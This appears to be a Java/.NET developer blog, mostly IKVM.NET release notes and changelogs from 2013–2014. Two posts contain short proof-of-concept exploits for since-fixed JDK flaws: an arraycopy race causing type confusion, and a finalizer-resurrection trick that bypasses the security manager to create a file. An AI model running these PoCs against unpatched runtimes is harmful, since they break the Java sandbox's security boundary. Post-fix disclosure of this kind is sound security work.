Wednesday, April 16, 2014

Arraycopy HotSpot Vulnerability Fixed in 7u55

Here is a simple PoC exploit for the issue fixed here:

class Union1 { }
class Union2 { }

class arraytoctou {
  static volatile Union1 u1 = new Union1();

  public static void main(String[] args) {
    final Union1[] arr1 = new Union1[1];
    final Union2[] arr2 = new Union2[1];
    new Thread() {
      public void run() {
        for(;;) {
          try {
            System.arraycopy(arr1, 0, arr2, 0, 1);
            if (arr2[0] != null) break;
          } catch (Exception _) { }
        }
      }
    }.start();

    while (arr2[0] == null) {
      arr1[0] = null;
      arr1[0] = u1;
    }

    System.out.println(arr2[0]);
  }
}

4/16/2014 10:40:19 AM (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

Monday, March 24, 2014

IKVM.NET 7.4 Release Candidate 0

The first release candidate is available. It can be downloaded here or from NuGet.

What's New (relative to IKVM.NET 7.3):

  • Merged OpenJDK 7u40 b34.
  • Many bug fixes.
  • Optimizations to reduce metadata size.
  • Added support for getting package information from the right jar manifest for ikvmc compiled jars.
  • Improved runtime support for running on platforms without Reflection.Emit.
  • Removed IKVM.Attributes.HideFromReflectionAttribute.
  • IKVM.Reflection: Many improvements and fixes.
  • IKVM.Reflection: WinMD projection support.

Changes since previous development snapshot:

  • IKVM.Reflection: Fix for Type.GetInterfaceMap() issue.

Binaries available here: ikvmbin-7.4.5196.0.zip

Sources: ikvmsrc-7.4.5196.0.zip, openjdk-7u40-b34-stripped.zip

3/24/2014 9:19:12 AM (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

Thursday, March 06, 2014

New Development Snapshot

Hopefully the last snapshot before the 7.4 release candidate.

Changes:

  • Added support for getting package information from the right jar manifest for ikvmc compiled jars.
  • Don't inject private helper methods in public interfaces, because csc.exe doesn't like interfaces with non-public methods.
  • Rewrote java.lang.ref.ReferenceQueue to be more efficient.
  • Bug fix. Non-public annotations can be used used in code that doesn't have access to them.
  • Merged forgotten 7u40 exclusive socket binding change.

Binaries available here: ikvmbin-7.4.5178.zip

3/6/2014 10:43:19 AM (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

Thursday, February 27, 2014

New Development Snapshot

A new development snapshot is available. I finished the merge of JSR-292 part of OpenJDK 7u40. The result is a bit depressing (but not unexpected) for the amount of effort that it took. The net result is that most stuff works the same (I did fix a couple of bugs), except slower.

I expect that eventually I'll get around to optimizing things a bit, but for now I've spent enough time on it to want to work on something else.

Changes:

  • Merged remaining OpenJDK 7u40 changes.
  • Guard against bogus LVT entries. Fix for bug #284.
  • Bug fix. MethodHandle.invoke[Exact] does not require a version 51 class file.
  • Bug fix. If a ghost array is used in an invokedynamic signature, we should not use the erased method type.
  • Added Unsafe.defineAnonymousClass().
  • Don't filter DynamicMethods from stack trace if IKVM_DISABLE_STACKTRACE_CLEANING is defined.
  • Bug fix. Unsafe.defineClass() should allow null class loader and '/' as package separator.
  • Added support for CallerID in pseudo-native methods.
  • Added Unsafe.shouldBeInitialized() and Unsafe.defineClass() overload.
  • Bug fix. If CLASSGC is enabled, we should use a WeakReference to cache the MethodType for the MethodHandle.invoke() cache.
  • Bug fix. MethodHandle.invoke() cache should consider vararg-ness of the MethodHandle.
  • Removed HideFromReflectionAttribute.
  • Added flags to HideFromJavaAttribute to support different levels of hiding (including the previous usage of HideFromReflectionAttribute and adding specific ability to hide from security stack walking and from stack traces, for future LamdbaForm support).
  • Bug fix. Constructing .NET value types using MethodHandle didn't work.

Binaries available here: ikvmbin-7.4.5170.zip

2/27/2014 8:16:31 AM (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

Friday, February 07, 2014

New Development Snapshot

I merged OpenJDK 7u40, except for the java.lang.invoke package. To build you'll need the new OpenJDK 7u40 based openjdk-7u40-b34-stripped.zip.

Changes:

  • Merged OpenJDK 7u40 b34.
  • Made all bytecode helper methods available during first-pass IKVM.Runtime.dll compilation (to avoid crashing IKVM build, if classes are missing).
  • Fixed ikvmc to not crash if type used in pseudo-native method signature is missing.
  • Refactored ikvmc -exclude: handling to allow -resource: to add .class files as resources.

Binaries available here: ikvmbin-7.4.5151.zip
Sources available here: ikvmsrc-7.4.5151.zip
The stripped OpenJDK 7u40 b34 sources are available here: openjdk-7u40-b34-stripped.zip

2/7/2014 3:16:32 PM (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

Tuesday, February 04, 2014

New Development Snapshot

I was at FOSDEM last weekend and was reminded that I hadn't released any IKVM.NET updates in a while. So lets try to get back on the wagon.

Changes:

  • Don't use CLR v2 peverify when targetting CLR v4.
  • Support inner classes in "new style" native methods.
  • Bug fix. Bypass security manager check when getting ikvm.reflect.field.inflationThreshold system property.
  • Bug fix. Volatile long & double fields cannot use slow path reflection, because .NET reflection does not ensure atomic reads/writes.
  • Reduced the number of cases where slow-path field reflection can't be used.
  • Allow slow path field reflection on remapped types and handle the unsupported scenarios explicitly.
  • Removed ICustomInvoke.
  • Changed Exception.writeReplace() method into a DynamicOnly method, because there's no real gain in using "fast" reflection.
  • Bug fix. We need to promote integral values to the proper type when calling a DynamicOnly method via reflection.
  • Unified the MethodWrapper.Invoke() semantics.
  • Added NO_REF_EMIT conditional compilation support for reflection.
  • Added no-ref-emit build target.
  • Fixed ILGenerator.EmitCalli() to not add the sentinel if there are no varargs.
  • Reimplemented JNI non-virtual method invocation based on delegates instead of DynamicMethod.
  • Emit non-virtual invocation delegate types when compiling with the -static option.
  • Made annotation custom attribute decoding lazy to work around issue reported in #270.
  • Removed unneeded use of reflection from AnnotationAttributeBase.
  • Made accidentally public methods AnnotationAttributeBase.newAnnotation() and AnnotationAttributeBase.decodeElementValue() internal.
  • Made AnnotationAttributeBase.writeReplace() method private.
  • Fixed various minor AnnotationAttributeBase issues.
  • Added (partial) support for Java 8 MethodParameters attribute.
  • Introduced EMITTERS conditional compilation constant.
  • Added a (partial) NO_REF_EMIT implementation of the DynamicCreateDelegate error hander.
  • If ikvmc -static option is used, don't add the InternalsVisibleTo("...-ikvm-runtime-injected") attribute.
  • Validate constant pool items referenced by EnclosingMethod attribute.
  • Updated Mono workaround for Mono 3.0.x.
  • Don't issue "warning IKVMC0100: Class "{0}" not found" for types that are only used in signatures.
  • Fixed JInternalFrame paint issue.
  • Performance fix. When throwing a ClassNotFoundException from Class.forName() or AssemblyClassLoader.loadClass() we should avoid calling fillInStackTrace() on the exception.
  • Bug fix. Check for supported delegate signatures should detect pointers inside byref and array types and return type should be checked as well.
  • Bug fix. Fake nested types should have Static modifier set in innerclasses attribute. Fixes scala compiler interop issue. Thanks to Michael Bayne for reporting this.
  • Bug fix. ikvmstub -skiperror should also skip errors during WriteClass.
  • Handle signatures with function pointer types in ikvmc and ikvmstub.
    Made BufferedImage.toBitmap() package private.
  • Fixed BufferedImage sync issues.
  • Add @Repeatable annotation to custom attribute annotations that AllowMultiple (when IKVM_EXPERIMENTAL_JDK_8 is defined).
  • Implemented getCurrentThreadCpuTime in management API.
  • Added support for binding method handles to methods that require CallerID.
  • Bug fix. String.CaseInsensitiveComparator inner class should be acknowledged by String.
  • Removed -X options from standard help text and added -X option to print -X options.
  • Change class format error exception message for missing Code attribute to same text as OpenJDK.
  • Allow Java 8 classes to use invokeStatic method handle constants that refer to InterfaceMethodref.
  • Bug fix. Non-blocking SocketChannel read/write with array of ByteBuffer would throw exception instead of returning 0 bytes read/written when no more buffer space is available.
  • Don't add SourceFileAttribute for inner classes if the name matches the outer class.
  • Use StringComparison.Ordinal when checking inner vs outer class names.
  • Compile anonymous and local classes as nested types.
  • Don't store class name in EnclosingMethodAttribute if we can use the DeclaringType.
  • Added optimization to omit ImplementAttribute in some cases.
  • Added optimization to omit InnerClassesAttribute to record reflective modifiers when we can predict them.
  • Updated java.sql.DriverManager to OpenJDK 7 (somehow this file was previously missed).
  • Merged in some missing changes in java.io.ObjectStreamClass.
  • Switched from @HasCallerID to @CallerSensitive and merged CallerSenstive related 7u40 changes.
  • Added ikvmstub -parameters option to add parameter names to stub classes.
  • Updated Throwable.initCause() and Throwable.addSuppressed() exceptions to match OpenJDK 7u40.
  • Fixed the SHFILEINFO declaration. Thanks to Andras Kovacs for reporting this.
  • Merged OpenJDK 7u40 changes to use SO_EXCLUSIVEADDRUSE for datagram sockets that don't use SO_REUSEADDR.
  • If an annotation is inconsistent with the annotation type, we should still record it as a dynamic annotation.
  • If an annotation's type does not exist, the annotation should be ignored instead of throwing an exception.
  • If an annotation is (no longer) RetentionPolicy.RUNTIME it should not be returned.
  • If an annotation is of a type that is not an annotation, it should be ignored.
  • Annotations that contain no longer existing values should not fail, but just ignore the value.
  • Class or enum values in annotations that refer to non-existing types should use TypeNotPresentExceptionProxy as the value, instead of failing to create the annotation.
  • Emulate some JDK annotation bugs.
  • If an annotation value is of the wrong type, use AnnotationTypeMismatchExceptionProxy as the value, instead of failing to create the annotation.
  • Fixed handling of annotations with invalid type signatures.
  • Fixed race condition in MethodWrapper.ResolveMethod().
  • Fix for bug #282. A potential fault block can't throw an exception from another fault block.
  • Improved trace message for JNI loadLibrary failure.
  • Improved handling of missing types (from missing assemblies in ikvmc).
  • Avoid reflection in creating ConditionalWeakTable value objects. Thanks to Michael Bayne for the idea.
  • Fixed method handle custom invoke to downcast the return type. Without the cast .NET 4.0 would throw a verification exception.
  • Implemented the StandardGlypVector constuctor with glyphs
  • Bug fix. JNI NewStringUTF should accept null pointer.
  • Bug fix. JNI Throw(NULL) should not clear pending exception.
  • Bug fix. JNI ThrowNew(..., NULL) should use default constructor.
  • Fixed initialization order issue. Don't abuse System.out to check if class library intialization is complete.
  • Bug fix. If a property getter/setter is accessed in a static initializer, it is not side-effect free.
  • IKVM.Reflection: Fixed DefineDynamicAssembly() overload taking an IEnumerable to accept null.
  • IKVM.Reflection: Added new .NET 4.5 static AssemblyBuilder.DefineDynamicAssembly() methods. They implicitly create a universe.
  • IKVM.Reflection: Added Universe.FromAssembly() API.
  • IKVM.Reflection: Bug fix. Fixed NRE in __StandAloneMethodSig.ContainsMissingType.
  • IKVM.Reflection: Use StringComparison.OrdinalIgnoreCase instead of StringComparison.InvariantCultureIgnoreCase.
  • IKVM.Reflection: Fixed unmanaged export table name sorting.
  • IKVM.Reflection: Expose ImageRuntimeVersion and MDStreamVersion on RawModule.
  • IKVM.Reflection: Bug fix. Assembly.Location should return "" instead of null, if there is no location.
  • IKVM.Reflection: Added Universe.OpenMappedRawModule() API to enable reading modules from memory or a crash dump file.
  • IKVM.Reflection: Fixed assembly name parsing to handle quoted keys and values. Thanks to Ian Battersby for reporting this.
  • IKVM.Reflection: Added the 4.5 (reference) assemblies to the framework list. The previous assumption was that we only need to add assemblies for previous frameworks, but that turns out to be incorrect because the list affects CompareAssemblyIdentity() which returns EquivalentFXUnified for framework assemblies.
  • IKVM.Reflection: ProcessorArchitecture should be read from flags and not its own field. This fixes the bug that GetReferencedAssemblies() did not return the ProcessorArchitecture part of the assembly flags.
  • IKVM.Reflection: Fixed assembly reference resolution issues (Name was not escape, Retargetable and ContentType attributes were not added, PublicKey was not converted to PublicKeyToken).
  • IKVM.Reflection: Fixed CompareAssemblyIdentity handling of Retargetable and added PublicKeyToken remapping.
  • IKVM.Reflection: Implemented WinMD projection support.
  • IKVM.Reflection: Fixed WindowsRuntime assembly detection (for projection purposes).
  • IKVM.Reflection: Added projection support for mixed CLR/WindowsRuntime assemblies.
  • IKVM.Reflection: Rewrote assembly name comparison to better handle remapping and Retargetable.
  • IKVM.Reflection: Moved version number parsing out of assembly name parser, because it turns out that AssemblyName and Fusion use different version number parsing rules.
  • IKVM.Reflection: Bug fix. ExceptionHandler.Equals(object) called itself instead of Equals(ExceptionHandler).
  • IKVM.Reflection: Only (incorrectly) set the TypeDefId for exported types from another assembly if we're targetting .NET 2.0 where .NET does so too and peverify warns if it isn't set.
  • IKVM.Reflection: Added new overload for __AddTypeForwarder() that takes an additional bool to disable automatically forwarding nested types.
  • IKVM.Reflection: Fix for bug #283.
  • IKVM.Reflection: Throw TypeLoadException when exported type (indirectly) points to itself.
  • IKVM.Reflection: When a cyclic type forwarder is found and UniverseOptions.ResolveMissingMembers is set, we should not throw an exception but instead create a missing type. Added a new Type.__IsCyclicTypeForwarder property to allow detecting this case.
  • IKVM.Reflection: Bug fix. Assembly may contain both PublicKeyToken and PublicKey if they are the same identity.

Binaries available here: ikvmbin-7.4.5148.zip

2/4/2014 4:32:04 PM (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

Thursday, January 16, 2014

Publicly Reported OpenJDK Vulnerability Fixed in 7u51

I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists.

Now that it has been fixed in 7u51, here is a simple PoC exploit:

import java.lang.invoke.*;

class test extends java.io.FileOutputStream {
  static test t;

  test() throws Exception {
    super("");
  }

  protected void finalize() {
    t = this;
  }

  public static void main(String[] args) throws Throwable {
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                        MethodType.methodType(void.class, String.class, boolean.class));
    System.out.println(mh);
    try { new test(); } catch (Exception _) { }
    System.gc();
    System.runFinalization();
    mh.invokeExact(t, "oops.txt", false);
  }
}

Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so.

1/16/2014 8:50:59 AM (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

Tuesday, October 29, 2013

Java Method Overriding Is FUBAR Part 8 of ∞

Due to my laziness and lameness my previous post wasn't as convincing as it should have been, so I'm going to try again.

Take this code:

class A {
  public static void main(String[] args) {
    A obj = new B();
    obj.finalize();
    obj = null;
    System.gc();
    System.runFinalization();
  }

  protected void finalize() {
    System.out.println("A.finalize");
  }
}

class B extends A {
  private void fin_lize() {
    System.out.println("B.finalize");
  }
}

Compile this and patch B.class to replace fin_lize with finalize.

What is the expected output of this program? In my opinion it is:

A.finalize
A.finalize

This is also the output that both JDK 1.1 and IKVM.NET give. However, on JDK 1.5 and up the output is:

A.finalize
B.finalize

This did not change in the 7u45 update.

To me the above is already enough to obviously demonstrate the problem, but since I'm apparently somewhat atypical I'm going to try to explain a bit more carefully.

  1. The Java 7 vmspec claims that private methods can override base class methods.
  2. JVMS section 5.4.5. Method overriding was added in the Java 7 edition of the JVMS. It is clearly incorrect as it disagrees with both previous and current behavior of all known JVMs.
  3. Given that private methods do not in fact override any methods, the check for final base class methods that was introduced in 7u45 is bogus.
  4. What should have been fixed in 7u45 is the native code that calls the finalize method, as it clearly needs to do a virtual invocation of Object.finalize() not call the private B.finalize method.

I hope I've done a better job now of making clear way the 7u45 update is bogus, the JVMS spec change is wrong and that finalization still needs to be fixed.

10/29/2013 1:53:34 PM (W. Europe Standard Time, UTC+01:00)  #    Comments [1]